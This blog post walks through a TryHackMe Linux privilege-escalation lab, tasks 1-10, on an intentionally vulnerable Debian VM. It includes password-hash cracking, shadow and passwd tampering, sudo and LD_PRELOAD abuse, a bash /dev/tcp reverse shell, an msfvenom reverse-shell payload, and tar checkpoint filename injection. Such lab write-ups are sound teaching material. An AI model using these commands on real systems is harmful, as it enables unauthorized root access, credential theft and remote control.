TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)

5/5 - (2 votes)


TryHackMe Magical Linux Privilege Escalation (1/2)
  • CTF Creator: Tib3rius
  • Link:
  • Difficulty: medium 
  • Target: gaining root access using a variety of different techniques
  • Highlight: Quickly gaining root access on a Linux computer in many different ways
  • Tags: privesc, linux, privilege escalation


Using different exploits to compromise operating systems can feel like magic (when they work!).

In this walkthrough, you will see various “magical” ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.

You can find the remaining tasks in the following Finxter tutorial:

👉 Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)

TASK 1 Deploy the Vulnerable Debian VM

After connecting to our TryHackMe VPN, let’s start our notes.txt file and write down our IPs in an export fashion.

export targetIP=
export myIP=

Now we can go ahead and log in via SSH using the starting credentials given in the instructions:

ssh user@
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

Now that we are in via SSH, let’s start exploiting this machine!

TASK 2 Service Exploits

In this task, we will privesc by exploiting MySQL using

We’ll create a new file named rootbash that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the privesc.

Task 3: Weak File Permissions – Readable /etc/shadow

In this task, we will read /etc/shadow and crack the hash with John the Ripper.

First, we need to save the root entry from /etc/shadow file as hash.txt.

Next, let’s load up John and crack the hash with rockyou.txt as our wordlist

john --wordlist=</PATH/TO/>rockyou.txt hash.txt

We have found our root password, password123!

TASK 4: Weak File Permissions – Writeable /etc/shadow

In this task, we will change the root password in /etc/shadow file.

mkpasswd -m sha-512 newpasswordhere
user@debian:~/tools/mysql-udf$ nano /etc/shadow
user@debian:~/tools/mysql-udf$ su root

TASK 5 Weak File Permissions – Writeable /etc/passwd

In this task, we will change the root passwd in /etc/passwd. First we need to generate a new hashed password: 

openssl passwd newpasswordhere

TASK 6 Sudo – Shell Escape Sequences

Let’s check our sudo privileges:

sudo -l

We can choose any of the many bin files that we have sudo permissions on, except for the apache2 bin that doesn’t have a sudo exploit listed on GTFObins

Today we’ll choose to run the exploit utilizing the more bin file.

👉 Link:

Running the following two commands gives us a root shell:

TERM= sudo more /etc/profile

TASK 7 Sudo – Environment Variables

Method 1: preload file spoofing

gcc -fPIC -shared -nostartfiles -o /tmp/ /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/ more

Method 2: shared object spoofing

ldd /usr/sbin/apache2
gcc -o /tmp/ -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2

TASK 8 Cron Jobs – File Permissions

In this task, we will root the Linux box by changing the file that is scheduled to run automatically every minute on cron jobs.

Because we have to write file permissions on the file, we can change the contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.

Overwrite the file with the following:

bash -i >& /dev/tcp/ 0>&1

Now, all we need to do is start a netcat listener and wait for a maximum of 1 minute to catch the revshell.

nc -lnvp 8888

TASK 9 Cron Jobs – PATH Environment Variable

In this task, we will hijack the PATH environment variable by creating an file in /home/user directory.

user@debian:~$ cat 
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

This bash script will copy /bin/bash (the shell) to the tmp directory, then add execute privileges and an suid bit. After the file runs, we can manually activate the root shell by running the new file “rootbash” with persistence mode.

user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id

uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# exit

TASK 10 Cron Jobs – Wildcards

In this exploit, we will use strange filenames to trick the system into thinking they are checkpoint flags on the tarball command which issue a command to run the elf shell to give us a root shell on our netcat listener. 

First, let’s create a new payload for a revshell

msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=8888 -f elf -o shell.elf

Next, we’ll transfer the elf file to /home/usr on the target via a simple HTTP server. Finally, we need to create two empty files with the following names:

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

Finally, we’ll need to start up a netcat listener to catch the root shell.

nc -lnvp 8888


Let’s remove the shell and the other two spoofed empty command extension files.

rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf


Magic isn’t actually needed to carry out any of the privesc methods outlined in this post.

As long as the target machine has a misconfiguration on password files (/etc/shadow and/or /etc/passwd), cron jobs are set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.

Thanks for reading this write-up, and be sure to check out part II for more “magical” privesc methods:

👉 Recommended: TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (2/2)